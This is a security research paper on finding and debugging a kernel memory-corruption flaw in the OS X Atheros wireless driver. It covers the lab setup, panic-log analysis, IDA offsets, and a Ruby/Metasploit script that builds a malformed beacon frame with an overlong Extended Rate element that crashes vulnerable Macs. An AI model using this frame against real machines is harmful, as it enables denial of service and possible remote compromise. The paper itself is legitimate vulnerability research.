OS X Kernel-mode Exploitation in a Weekend
September, 2007
David Maynor
dave@erratasec.com
http://www.erratasec.com/

Abstract: Apple's Mac OS X operating system is attracting more attention from users and security researchers alike. Despite this increased interest, there is still an apparent lack of detailed vulnerability development information for OS X. This paper attempts to help bridge this gap by walking through the entire vulnerability development process. This process starts with vulnerability discovery and ultimately finishes with remote code execution. To help illustrate this process, a real vulnerability found in the OS X wireless device driver is used.

1) Introduction

OS X has a strange place in the hearts and the minds of the research community. Security researchers, like most other users, enjoy a well-built and reliable hardware platform topped off by an operating system with a slick interface. Switch gears from the user's experience to a more research-oriented focus and problems start to appear. Researchers have historically explored and documented internals of operating systems like Microsoft's Windows and open source counterparts such as Linux and BSD variants. The knowledge gaps for OS X are in no way a show stopper for researching security vulnerabilities on OS X; still, they prove to be a frustrating speed bump. While static analysis of binaries in a Windows environment may be trivial, the same cannot be said of OS X.

This document contains information collected from a variety of sources after discovering a flaw in a wireless device driver for OS X. Before the accidental discovery of the wireless flaw, the author knew next to nothing about the internals of OS X or its ``xnu'' kernel. Google, in a rare failure, also provided next to no help. All the articles the author encountered only narrowly covered a topic without talking about how one could go about building a useful research environment.
Many of these articles talked about something each respective author discovered without showing how others could rediscover it. For this reason, the author includes tips throughout this paper in the form of sections entitled ``Things I wish Google told me''. The Test Network Many elements are required when finding and duplicating a wireless vulnerability. Since the target for the attack described in this paper is running the OS X operating system, at least two OS X machines are needed for kernel debugging with gdb (the ``GNU Debugger''). A third computer with a D-Link WDA-2320 Atheros based card is used as the attacking machine. The attacking machine uses a small Linux based distribution that runs from a CD called BackTrack2. BackTrack2 is used because it includes many special 802.11 drivers that are capable of raw packet injection, a feature that most wifi drivers (frustratingly) lack. The author's initial research on the subject described in this paper made use of a patched version of ``Madwifi-old'' with LORCON. Madwifi is the name of the open-source drivers for chipsets from Atheros. LORCON is a wifi fuzzing tool written by Josh Wright. Since quick and flexible packet generation is important, the original tool used for this research was ``scapy'', a packet creation engine written in Python. The examples in this paper, written almost one year later, make use of the Metasploit LORCON integration and are written in Ruby. To help provide some perspective on the research environment used in this document, the following three machine configurations should be referenced: Target Machine Hardware: Mac Mini, 1.66Ghz, 512MB RAM OS Version: 10.4.7 IP Address: 192.168.1.20 Role: The target machine is the victim in the testing scenario. It is running a vulnerable version of the OS X Atheros driver. Dev Machine Hardware: Macbook, 2GHz Intel Core Duo, 1 GB RAM OS Version: 10.4.7 IP Address: 192.168.1.1 Role: This machine runs gdb for connection to the target machine. 
It is also set up as a core dump server, but that functionality appears broken. This box also archives the panic logs and register information along with stack traces. This is the primary machine for single-step debugging.

Attack Machine
Hardware: Generic shuttle PC, Pentium 3, 512MB RAM
OS Version: Backtrack2 Bootable Linux CD
IP Address: 192.168.1.50
Role: This is the attacking machine. The attack was initially launched from a Dell laptop with a PCMCIA card. This machine has close to the same specifications, with an Atheros-based D-Link card. The attacks are written in Ruby using the Metasploit framework integration with LORCON.

2) Vulnerability Discovery

One of the major staples in a researcher's toolbox is binary analysis (where ``binary'' refers to compiled software code). Vulnerability research and discovery on OS X is no different in this regard. However, performing binary analysis on OS X requires some understanding of the underlying binary file format that is used. On OS X, Apple's executable format is Mach-O, and many binaries ship as universal binaries. In this context, a universal binary will execute on both Intel and PPC based machines. It accomplishes this by combining a compiled binary version of the program for each processor in an archive-like format with a header that contains specific information relating to each processor type. The universal binary header is detected at runtime, causing the correct compiled code for the platform to execute. Although universal binaries provide an elegant solution for an operating system that supports multiple architectures, they lead to problems when performing binary analysis because not many tools support the file format at the time of this writing. Recently, IDA Pro added support for the binary format in 5.1. Prior to 5.1, reversing a universal binary required manual manipulation or scripting in IDC.
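To make the ``archive-like format'' more concrete, the following is a minimal Ruby sketch of reading a universal binary header. The layout assumed here (a big-endian magic of 0xcafebabe, an architecture count, then one 20-byte record per architecture holding cputype, cpusubtype, offset, size and align) follows Apple's mach-o/fat.h. The helper name and the synthetic two-slice header are made up for illustration and do not come from the Atheros driver.

```ruby
FAT_MAGIC = 0xcafebabe
# CPU_TYPE_I386 is 7 and CPU_TYPE_POWERPC is 18 in Apple's headers.
CPU_NAMES = { 7 => 'i386', 18 => 'ppc' }.freeze

# Parse the fat header at the start of +data+ (a binary String).
# Returns one hash per architecture slice, or nil if the magic does not match.
def parse_fat_header(data)
  magic, count = data.unpack('N2')
  return nil unless magic == FAT_MAGIC

  (0...count).map do |i|
    cputype, cpusubtype, offset, size, align = data[8 + i * 20, 20].unpack('N5')
    { cpu: CPU_NAMES.fetch(cputype, cputype.to_s), subtype: cpusubtype,
      offset: offset, size: size, align: align }
  end
end

# Synthetic two-slice header; the offsets and sizes are hypothetical.
header = [FAT_MAGIC, 2,
          18, 0, 0x1000, 0x20000, 12,
          7, 3, 0x21000, 0x30000, 12].pack('N*')

parse_fat_header(header).each do |arch|
  puts format('%-5s offset=0x%x size=0x%x', arch[:cpu], arch[:offset], arch[:size])
end
```

Each record points at a complete single-architecture image inside the file, which is why a tool only has to copy one slice out to produce a thin binary.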
Things I wish Google told me: Disassembling OS X binaries

Apple provides tools that support the manipulation of universal binaries and are capable of creating a simplified binary suitable for hassle-free loading into IDA Pro. One of these tools, ``lipo'', allows a researcher to extract the relevant chunk of compiled code from a universal binary. The following gives a quick example of using lipo on the Atheros driver from OS X 10.4.7. This will create a thin file called at.i386 that is suitable for loading into IDA Pro without the confusing archive headers and without the older PowerPC code.

lipo -thin i386 AirPortAtheros5424 -output at.i386

The vulnerability featured in this paper is a flaw in Apple's wireless device driver. This flaw was discovered through ``beacon'' and ``probe response'' fuzzing. Beacons are the packets that wireless access points broadcast several times a second to announce their presence to the world. They are also the packets that a notebook computer uses in order to build a list of nearby access points. Probe responses are similar packets that are used when a notebook computer probes for access points that are not otherwise broadcasting.

The bug described in this paper was found by the author while performing fuzzing experiments against other machines. During this time, one of the Macbooks in the vicinity running OS X 10.4.6 crashed unexpectedly. This crash produced a file called panic.log in /Library/Logs. A panic.log file contains information to help debug a kernel panic or crash on OS X. This includes the contents of all the registers, a stack trace, the load address of the offending module, and the load addresses of its dependent modules. This information provides a great starting place to help track down a driver problem. However, in its default form, there are several shortcomings. The most apparent shortcoming is that the stack trace does not include symbol information. As such, one sees addresses rather than function names.
In order to begin to track down a problem, one needs to do some basic math to manually discover the names of the functions. Luckily, the loading offsets did not change much on the test machine when reproducing this issue. The following output shows an example panic.log: panic(cpu 0 caller 0x0019CADF): Unresolved kernel trap (CPU 0, Type 14=pagefault), registers: CR0: 0x8001003b, CR2: 0x62413863, CR3: 0x021d7000, CR4: 0x000006e0 EAX: 0x62413862, EBX: 0x00000003, ECX: 0x0c67bc8c, EDX: 0x00000003 ESP: 0x62413863, EBP: 0x0c67bad4, ESI: 0x03717804, EDI: 0x0371787c EFL: 0x00010202, EIP: 0x008c923d, CS: 0x00000008, DS: 0x0c670010 Backtrace, Format - Frame : Return Address (4 potential args on stack) 0xc67b954 : 0x128b5e (0x3bc46c 0xc67b978 0x131bbc 0x0) 0xc67b994 : 0x19cadf (0x3c18e4 0x0 0xe 0x3c169c) 0xc67ba44 : 0x197c7d (0xc67ba58 0xc67bad4 0x8c923d 0x48) 0xc67ba50 : 0x8c923d (0x48 0x10 0x1e200010 0xc670010) 0xc67bad4 : 0x8c7303 (0x371787c 0x1e202d0d 0x8 0x5) 0xc67bb24 : 0x8bccb9 (0x3699804 0xc67bc8c 0x1e202800 0x80) 0xc67bb84 : 0x8cd799 (0x369b46c 0xc67bc8c 0x1e202800 0x80) 0xc67bce4 : 0x8ddbd9 (0x369b46c 0x1e20cb00 0x36bbc04 0x80) 0xc67bd34 : 0x8ce9a5 (0x369b46c 0x1e20cb00 0x36bbc04 0x80) 0xc67be24 : 0x8de86a (0x369b46c 0x1e20cb00 0x36bbc04 0x46) 0xc67bf14 : 0x38dd6d (0x369b29c 0x354d080 0x1 0x36a7e58) 0xc67bf64 : 0x38cf19 (0x354d080 0x135d18 0x0 0x36a7e58) 0xc67bf94 : 0x38cc3d (0x3575140 0x3575140 0x0 0x450) 0xc67bfd4 : 0x197b19 (0x3575140 0x0 0x36a80d0 0x3) Backtrace terminated-invalid frame pointer 0x0 Kernel loadable modules in backtrace (with dependencies): com.apple.driver.AirPortAtheros5424(104.1)@0x8bb000 dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x672000 dependency: com.apple.iokit.IOPCIFamily(2.0)@0x563000 dependency: com.apple.iokit.IO80211Family(112.1)@0x8a2000 When an OS X driver is loaded into IDA, the offsets are all relative to 0. 
In order to find the address where a kernel driver crashed, subtract the module load address from the stack trace address associated with the module. Then subtract a further 0x1000 from the result because kernel modules are loaded in a page-aligned fashion. Here is a typical panic.log from /Library/Logs created for this example.

panic(cpu 1 caller 0x0019CADF): Unresolved kernel trap (CPU 1, Type 14=pagefault), registers:
CR0: 0x80010033, CR2: 0x00000004, CR3: 0x02209000, CR4: 0x000006a0
EAX: 0x00000000, EBX: 0x00111111, ECX: 0x000005c3, EDX: 0x00000039
ESP: 0x00000004, EBP: 0x0c74b758, ESI: 0x00111111, EDI: 0x0345bbf0
EFL: 0x00010206, EIP: 0x0090df95, CS: 0x00000008, DS: 0x03a10010
Backtrace, Format - Frame : Return Address (4 potential args on stack)
0xc74b5d8 : 0x128b5e (0x3bc46c 0xc74b5fc 0x131bbc 0x0)
0xc74b618 : 0x19cadf (0x3c18e4 0x1 0xe 0x3c169c)
0xc74b6c8 : 0x197c7d (0xc74b6dc 0xc74b758 0x90df95 0x110048)
0xc74b6d4 : 0x90df95 (0x110048 0x2920010 0x10 0x3a10010)
0xc74b758 : 0x8f2083 (0x345a000 0x111111 0xc74b778 0x800016c3)
0xc74b7a8 : 0x9112b7 (0x36d5804 0x90df78 0x345a000 0x3a1f5a5)
0xc74b7c8 : 0x9115b9 (0x345a000 0x345a46c 0x345bdb8 0x196fc1)
0xc74b808 : 0x8dec91 (0x345a000 0x36d6800 0xc74b828 0x0)
0xc74ba08 : 0x8d600c (0x368a360 0x3a1f5a5 0x6 0x339c91)
0xc74bcb8 : 0x38e698 (0x345a000 0x8 0x3a1f5a5 0x0)
0xc74bcf8 : 0x8d5284 (0x35aa900 0x8d5c7c 0x8 0x3a1f5a5)
0xc74bd38 : 0x3a3d5c (0x345a000 0x8 0x3a1f5a5 0x0)
0xc74bd88 : 0x18a83d (0x36f8d00 0x0 0x3a1f5a4 0x22)
0xc74bdd8 : 0x12b389 (0x3a1f57c 0x39c756c 0x0 0x0)
0xc74be18 : 0x124902 (0x3a1f500 0x0 0x50 0xc74befc)
0xc74bf28 : 0x193034 (0xc74bf54 0x0 0x0 0x0)
Backtrace continues...
Kernel loadable modules in backtrace (with dependencies):
com.apple.driver.AirPortAtheros5424(104.1)@0x8e7000
dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x873000
dependency: com.apple.iokit.IOPCIFamily(2.0)@0x57e000
dependency: com.apple.iokit.IO80211Family(112.1)@0x8ce000
com.apple.iokit.IO80211Family(112.1)@0x8ce000
dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x873000
dependency: com.apple.iokit.IOPCIFamily(2.0)@0x57e000
Kernel version:
Darwin Kernel Version 8.7.1: Wed Jun 7 16:19:56 PDT 2006; root:xnu-792.9.72.obj~2/RELEASE_I386

The AirPort Atheros module has a load address of 0x8e7000, which rules out the first three entries in the stack trace as being found within this driver. The fourth entry, 0x90df95, is within the range of the driver. By performing a few quick calculations, it is possible to calculate the relative offset into the associated driver's binary:

0x90df95 - 0x8e7000 - 0x1000 = 0x25f95

Opening the driver in IDA Pro and then jumping to offset 0x25f95 will yield the following code from ath_copy_scan_results:

__text:00025F87 mov esi, [ebp+arg_4]
__text:00025F8A mov edi, eax
__text:00025F8C add edi, 1BF0h
__text:00025F92 mov eax, [esi+60h]
__text:00025F95 movzx ecx, byte ptr [eax+4]
__text:00025F99 mov eax, ecx
__text:00025F9B shr al, 3

Looking at this crash log, one of the first lines quickly gives insight into how to analyze this dump:

panic(cpu 1 caller 0x0019CADF): Unresolved kernel trap (CPU 1, Type 14=pagefault)

A page fault usually means that some code tried to access an invalid address. In a case such as this, the CR2 register (shown in gdb with info registers) will contain the offending address. Intel processors contain a whole set of non-general-purpose registers like CR2 that are used for hardware and driver debugging. These are registers that one would not normally interact with when debugging userland code. In this case, the offending address is 0x00000004.
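The offset arithmetic used earlier in this section (stack trace address, minus module load address, minus 0x1000) is easy to get wrong by hand, so a small Ruby helper can do it. This is a sketch only: the function names are hypothetical, the load addresses are the ones from the second panic log, and choosing the module with the highest load address at or below the frame is a guess, because the panic log does not list module sizes. Whether the same 0x1000 adjustment applies to modules other than the Atheros driver is also an assumption.

```ruby
KEXT_ADJUST = 0x1000 # adjustment described in the text

# Load addresses from the "Kernel loadable modules" section of the panic log.
MODULES = {
  'com.apple.driver.AirPortAtheros5424' => 0x8e7000,
  'com.apple.iokit.IONetworkingFamily'  => 0x873000,
  'com.apple.iokit.IOPCIFamily'         => 0x57e000,
  'com.apple.iokit.IO80211Family'       => 0x8ce000
}.freeze

# Pick the listed module with the highest load address that is <= addr.
# Returns [name, base], or nil when the address is below every module.
def owning_module(addr, modules = MODULES)
  modules.select { |_, base| base <= addr }.max_by { |_, base| base }
end

# Translate a runtime address into an offset usable in the disassembler.
def file_offset(addr, modules = MODULES)
  name, base = owning_module(addr, modules)
  return nil if name.nil?

  [name, addr - base - KEXT_ADJUST]
end

[0x197c7d, 0x90df95].each do |addr|
  name, off = file_offset(addr)
  if name
    puts format('0x%x -> %s + 0x%x', addr, name, off)
  else
    puts format('0x%x -> not in a listed module', addr)
  end
end
```

For 0x90df95 this reproduces the 0x25f95 offset computed by hand, while 0x197c7d falls below every listed module and is therefore treated as a kernel address.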
Looking at the instruction that triggers the page fault, one can see a dereference of EAX: movzx ecx, byte ptr [eax+4]. The EAX register is zero, so the value of CR2 came from the machine adding 4 to the address in EAX. By looking at these register values, one can determine that this panic log was caused by a NULL pointer dereference in the wireless device driver. Although it is a bit out of the scope for this document, the three addresses that precede the Atheros address in the stack trace are:

0x128b5e panic
0x19cadf panic_trap
0x197c7d trap_from_kernel

When performing OS X kernel auditing and exploit development, these three addresses will become a very familiar sight in a panic log, so get used to ignoring the first three and starting at the fourth address.

3) The Flaw

Standard exploit development techniques rarely work well when applied to kernel-level vulnerabilities. The kernel environment is much less friendly to the exploit writer than user mode. Each specific vulnerability will likely require custom techniques. The flaw described in the previous chapter was found in the driver provided by Apple in Mac OS X version 10.4.7 on Macbooks and Mac Minis running on an Intel processor. This flaw allows an attacker to compromise and gain complete control of a targeted machine. Since the flaw requires a targeted machine to receive and process a wireless management frame, the attacker must be within range in order to transmit the frame. In addition, OS X discards valid frames with a weak signal, so the attacker has to be especially close to the victim machine. As was described above, this flaw was discovered accidentally while fuzz testing other devices.
The ``scapy'' fuzzing tool was used to generate wireless management frames with a random number of Information Elements (IEs) of random sizes that were then transmitted to the broadcast address. The beacon packets sent by access points contain a number of variable-length IEs such as the advertised SSID, the list of supported speeds, the country it works in, authentication information, channels, time, timezone, and vendor-specific information, such as how to find the music containing your Zune media player. The Macbook crashed due to a page fault caused by the wireless driver during the processing of one of these fuzz packets. The panic log showed arbitrary memory corruption in the form of overwritten values that are later used as the source or destination of copies in memory. Three crash dumps which are described below clearly show that memory was corrupted during the handling of these fuzz packets.

Example 1: Attempt to access 0x62413863:
panic(cpu 0 caller 0x0019CADF): Unresolved kernel trap (CPU 0, Type 14=pagefault), registers:
CR0: 0x8001003b, CR2: 0x62413863, CR3: 0x021d7000, CR4: 0x000006e0
EAX: 0x62413862, EBX: 0x00000003, ECX: 0x0c67bc8c, EDX: 0x00000003
ESP: 0x62413863, EBP: 0x0c67bad4, ESI: 0x03717804, EDI: 0x0371787c
EFL: 0x00010202, EIP: 0x008c923d, CS: 0x00000008, DS: 0x0c670010
#3 0x00197c7d in trap_from_kernel ()
#4 0x008c923d in ieee80211_saveie ()
#5 0x008c7303 in sta_add ()
#6 0x008bccb9 in ieee80211_add_scan ()
#7 0x008cd799 in ieee80211_recv_mgmt ()
#8 0x008ddbd9 in ath_recv_mgmt ()
#9 0x008ce9a5 in ieee80211_input ()
#10 0x008de86a in ath_intr ()

Example 2: Attempt to access 0xcc
panic(cpu 1 caller 0x0019CADF): Unresolved kernel trap (CPU 1, Type 14=pagefault), registers:
CR0: 0x8001003b, CR2: 0x000000cc, CR3: 0x021d7000, CR4: 0x000006a0
EAX: 0x00000033, EBX: 0x037d8504, ECX: 0x036a4c78, EDX: 0x0360b610
ESP: 0x000000cc, EBP: 0x0c6ebea4, ESI: 0x037d8504, EDI: 0x0369b46c
EFL: 0x00010206, EIP: 0x008c5f03, CS: 0x00000008, DS: 0x00000010
#3 0x00197c7d in trap_from_kernel ()
#4 0x008c5f03 in sta_update_notseen ()
#5 0x008c6ba0 in sta_pick_bss ()
#6 0x008bd77c in scan_next ()
#7 0x008bc314 in thread_call_func ()

Example 3: Attempt to copy from 0x41316341
eax 0xaca7000 181039104
ecx 0xc98 3224
edx 0x3263 12899
ebx 0xf 15
esp 0xc6e3714 0xc6e3714
ebp 0xc6e3758 0xc6e3758
esi 0x41316341 1093755713
edi 0xaca7000 181039104
eip 0x1933de 0x1933de
eflags 0x10203 66051
cs 0x8 8
ss 0x10 16
ds 0x120010 1179664
es 0xc6e0010 208535568
fs 0x10 16
gs 0x900048 9437256
Program received signal SIGTRAP, Trace/breakpoint trap.
0x001933de in memcpy_common ()
2: x/i $eip 0x1933de : repz movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
#0 0x001933de in memcpy_common ()
#1 0x03915004 in ?? ()
#2 0x008c6083 in sta_iterate ()
#3 0x008e52b7 in AirPort_Athr5424::ieee80211_notify_scan_done ()
#4 0x008e55b9 in AirPort_Athr5424::setSCAN_REQ ()
#5 0x008b2c91 in IO80211Scanner::scan ()
#6 0x008aa00c in IO80211Controller::execCommand ()
#7 0x0038e698 in IOCommandGate::runAction (this=0x3595300, inAction=0x8a9c7c , arg0=0x8, arg1=0x399aea5, arg2=0x0, arg3=0xc6e3d2c) at /SourceCache/xnu/xnu-792.9.72/iokit/Kernel/IOCommandGate.cpp:152
#8 0x008a9284 in IO80211Controller::queueCommand ()

Tracking down the packet that crashes a wireless driver can be frustrating because it is not necessarily the last packet to be received or transmitted. This matters when the number of packets produced and injected can be as many as several thousand per minute. Since the memory overwrites illustrated above cover an entire 32-bit value, like 0x41414141, a method to tag which packet number is responsible for the overwrite can help to cut down on this frustration. A counter for packet tracking can be inserted into packets at generation time. There are a few specific places where storing this counter can help with packet identification. The first place is the last 4 bytes of a BSSID with the first two bytes remaining static.
For example, 0xcc 0xcc 0x41 0x41 0x41 0x01 is the BSSID of the first packet sent. When the last byte of the MAC address reaches 0xff, the next higher byte starts counting. As such, 0xcc 0xcc 0x41 0x41 0x01 0x01 is the BSSID for the 256th packet sent. Likewise, the fuzzer can pad the information-element buffer in the same way with a repeating pattern of 0x41 0x41 0x41 0x01 for the first packet sent. The reason for padding the value with the extra data instead of just setting the unused bytes to 0x00 is related to the page faults. While 0x41 0x41 0x41 0xf1 may translate to a bad address and cause a page fault during access attempts, 0x00 0x00 0x43 0x12 may be valid and cause no problems. Since kernel panics are the primary means of isolating the flaw at this point, a corrupted value needs to cause a crash instead of silently allowing the kernel to continue executing.

Several tests reveal that the only anomaly common to all the packets that cause an overwrite is an overly long Extended Rate element, which is an IE sent by the access point to advertise additional speeds, such as 11 Mbps, that the access point supports. To verify this, the author changed the script so that it would generate a distinctive pattern in the Extended Rate IE. This pattern showing up in the crash dumps made it possible to prove that it was the ``Extended Rate'' IE that was the problem. The amount of the pattern found in memory made it easy to determine how much memory was corrupted.
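The two tagging ideas above can be sketched in Ruby. The counter is implemented as a bijective base-255 number, which is one reading of the scheme that reproduces both BSSID examples and never emits a 0x00 byte. The pattern generator imitates the well-known ``Aa0Aa1Aa2'' style; it is an assumption that the author's script produced the same sequence, although the register values in Examples 1 and 3 are consistent with it. All function names are hypothetical.

```ruby
# Bijective base-255 counter: every digit is in 0x01..0xff, so a tag never
# contains a 0x00 byte. Unused leading bytes are filled with 0x41.
def tag_bytes(n, width = 4, pad = 0x41)
  raise ArgumentError, 'counter starts at 1' if n < 1

  digits = []
  while n > 0
    d = n % 255
    d = 255 if d.zero?
    digits.unshift(d)
    n = (n - d) / 255
  end
  raise ArgumentError, 'counter too large' if digits.length > width

  Array.new(width - digits.length, pad) + digits
end

# Two static bytes followed by the four tag bytes.
def tagged_bssid(n)
  ([0xcc, 0xcc] + tag_bytes(n)).pack('C*')
end

# Non-repeating "Aa0Aa1Aa2..." pattern of the requested length.
def cyclic_pattern(length)
  out = String.new
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# Offset of a 32-bit register value (little-endian in memory) in the pattern.
def pattern_offset(value, length = 240)
  cyclic_pattern(length).index([value].pack('V'))
end

puts tagged_bssid(256).bytes.map { |b| format('0x%02x', b) }.join(' ')
puts pattern_offset(0x62413862)
puts pattern_offset(0x41316341)
```

Under these assumptions, the EAX value from Example 1 (0x62413862) sits at offset 55 of a 240-byte pattern and the ESI value from Example 3 (0x41316341) at offset 63. One caveat of the counter scheme is that 0x41 is also a legal digit, so very large counters become ambiguous when decoded.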
The following Ruby code shows how the packet was crafted that made it possible to come to this conclusion:

ssid = Rex::Text.rand_text_alphanumeric(rand(255))
bssid = "\x61\x61\x61" + Rex::Text.rand_text(3)
seq = [rand(255)].pack('n')
xrate = Rex::Text.rand_pattern_create(240)
# channel is assumed to be defined by the surrounding script
frame =
  "\x80" + "\x00" +               # frame control: beacon
  "\x00\x00" +                    # duration
  "\xff\xff\xff\xff\xff\xff" +    # destination: broadcast
  bssid +                         # source
  bssid +                         # BSSID
  seq +                           # sequence control
  Rex::Text.rand_text(8) +        # timestamp
  "\xff\xff" +                    # beacon interval
  Rex::Text.rand_text(2) +        # capability info
  #ssid tag
  "\x00" + ssid.length.chr + ssid +
  #supported rates
  "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
  #current channel
  "\x03" + "\x01" + channel.chr +
  #Xrate
  "\x32" + xrate.length.chr + xrate

When this packet is transmitted, the victim machine will not crash right away. The vulnerable code does not process the packets the instant they are received. The packets are instead only processed when the information is needed for a scan. OS X produces a new scan every five minutes. As such, the machine may take up to five minutes to crash after receiving a corrupted packet. Pinning down this bug therefore meant forcing a scan. As luck would have it, Apple provides a tool called airport for this sort of thing (located in /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources). Executing airport -z will disassociate the machine from whatever wireless access point it is currently using. Executing airport -s will force the driver to run a scan and report all access points within range. In order to crash the machine quickly after a corrupted Extended Rate IE is sent, the author ran the command airport -s -r 10000. The ``-r'' option tells the airport command to repeat an action a given number of times which, in this case, causes 10000 re-scans. Running this command would cause the machine to reliably crash in the same manner every time. This makes it possible to figure out where, precisely, the wireless driver is crashing.
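The frame layout used by the script earlier in this section can also be sketched without Metasploit, which makes the id/length/data structure of each IE explicit. The sketch below only builds and re-parses bytes and does not transmit anything. The helper names, the fixed capability value and the sample SSID are illustrative choices rather than details taken from the author's tool.

```ruby
# Encode one information element as id, length, data.
def ie(id, data)
  data = data.b
  raise ArgumentError, 'IE data is limited to 255 bytes' if data.bytesize > 255

  [id, data.bytesize].pack('CC') + data
end

# Build a beacon: 24-byte header, 12 bytes of fixed fields, then the IEs.
def beacon(bssid:, ssid:, channel:, xrates:, interval: 0xffff, seq: 0)
  header = [0x80, 0x00].pack('CC') +   # frame control: management, beacon
           "\x00\x00".b +              # duration
           ("\xff".b * 6) +            # destination: broadcast
           bssid.b + bssid.b +         # source and BSSID
           [seq].pack('v')             # sequence control
  fixed = ("\x00".b * 8) +             # timestamp
          [interval].pack('v') +       # beacon interval
          [0x0001].pack('v')           # capability info (assumed: ESS only)
  header + fixed +
    ie(0x00, ssid) +                                  # SSID
    ie(0x01, "\x82\x84\x8b\x96\x0c\x18\x30\x48") +    # supported rates
    ie(0x03, [channel].pack('C')) +                   # current channel
    ie(0x32, xrates)                                  # extended rates
end

# Return [id, data] pairs for the IEs that follow the first 36 bytes.
def parse_ies(frame)
  ies = []
  offset = 36
  while offset + 2 <= frame.bytesize
    id, len = frame.byteslice(offset, 2).unpack('CC')
    ies << [id, frame.byteslice(offset + 2, len)]
    offset += 2 + len
  end
  ies
end

frame = beacon(bssid: "\x61\x61\x61\x01\x02\x03", ssid: 'test',
               channel: 11, xrates: 'A' * 240)
parse_ies(frame).each do |id, data|
  puts format('IE 0x%02x, %d bytes', id, data.bytesize)
end
```

A 240-byte Extended Rate element is perfectly legal as far as the one-byte length field is concerned, which is why a receiver has to enforce its own, much smaller, limit before copying the data.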
In this case, the corrupted IE in the packet that is transmitted causes a crash in a memcpy called from a function named ath_copy_scan_results in the Apple driver. It appears that the attacker can influence where the memcpy will read from and how much data will be copied. Since an attacker can copy arbitrary data from one area of memory (such as the packet) to another area of memory, it will most likely be possible to gain code execution. If no scan is forced and the target machine is not associated with an access point, a different crash will reliably occur in a memcmp called from a function named sta_add. The memcmp is meant to check to see if a BSSID is the same as one that has been stored. However, the overflow corrupts a structure so that it compares the pointer to the new BSSID against a pointer that the attacker can set.

Most of the beacon intervals in the test scripts are set to 0xffff, which is a little over 67 seconds. This means that a machine that receives and adds one of these beacon packets into its scan cache is not expecting to get another update from the BSSID for a little over 67 seconds. Generally, management frame fuzzing means the creation of something like a fake beacon frame that is quickly injected and forgotten. A real AP would continue sending beacon packets to let a potential client know it is still available. A driver will wait up until its beacon interval before taking actions such as marking the AP with the missed beacon as non-preferential for connection or even removing it from the scan cache altogether. In order to have many packets processed, the author set the beacon interval time to its maximum so the driver would not get suspicious for at least 67 seconds, thus allowing time for the fake AP to go through processing. In other words, real access points normally send beacons several times a second. By using the maximum interval, one only needs to send a corrupted beacon packet once a minute.
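The ``little over 67 seconds'' figure follows from the unit of the beacon interval field, which 802.11 defines as time units of 1024 microseconds. A short Ruby check of that arithmetic is shown below; the function name is made up, and the 100 TU comparison value is a commonly seen access point default rather than something measured for this paper.

```ruby
TU_MICROSECONDS = 1024 # one 802.11 time unit

# Convert a beacon interval expressed in time units into seconds.
def beacon_interval_seconds(tu)
  tu * TU_MICROSECONDS / 1_000_000.0
end

puts beacon_interval_seconds(0xffff) # largest value the 16-bit field can hold
puts beacon_interval_seconds(100)    # common default, roughly ten beacons a second
```

The maximum works out to 65535 x 1024 microseconds, or about 67.1 seconds.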
If the memcmp crash does not occur during normal operations, a crash in a function called staupdate can occur. Although the specific locations at which the crash occurs within this function can differ, the crash will occur reliably with the same data if the malicious frame is the same. Analyzing these repeated crashes helps to localize where memory corruption is occurring in the code. This can include static analysis using tools like IDA Pro to read the compiled driver code. This can also include dynamic analysis, such as stepping through the code with a debugger like gdb to watch step-by-step what the driver does when it overwrites memory.

Debugging a kernel driver in real-time requires setting up two machines for gdb and enabling the kernel core dump facility. There are numerous documents on how to set up live kernel debugging with gdb, so that information is not rehashed here. The specific OS X boot settings the author uses involve setting the nvram boot-args argument to debug=0xd44 _panicd_ip=192.168.1.1 -v. This setting is the easiest for two-machine debugging; however, the target machine will no longer produce a panic log.

Things I wish Google told me: kernel core dumps on Intel are broken

The kernel core dump functionality on the Intel architecture appears to be broken. Following the directions for the target and development machine yielded no core dumps. After investigating this problem, it seems to stem from the fact that the panicking machine performs no ARP resolution during a crash. The panicking machine instead forwards information to its default router. OS X expects the default router to forward this information to the core dump server. The author has found that the best way to encourage proper handling is to place the development machine on a different subnet from the target machine. Keep in mind that this information was gleaned through a series of changes, tests, and observations with a network sniffer.
Setting the ARP entry statically with the command arp -s did not help.

4) Debugging the Crash

One of the many benefits of remote kernel debugging is the ability to view a stack backtrace with symbol information. The vulnerability described in the previous chapter showed crashes in many different functions such as sta_add, ath_copy_scan_results, and sta_update_notseen. Googling these function names will reveal that many of them are present in the open source Madwifi project for Atheros based wireless hardware. They are also present in the FreeBSD net80211 project. Apple based their driver on these open-source projects. Since these projects use the BSD open-source license, Apple is not required to open their source code modifications. While the Apple Atheros driver does not exactly match the open source projects, they match closely enough to make reverse engineering much easier. The source trees for the Apple Airport driver and Madwifi are so close that the same debug flags work. Using sysctl to set the debug options on either debug.net80211 or debug.athdriver will cause a flood of diagnostic information to fill /var/log/system.log.
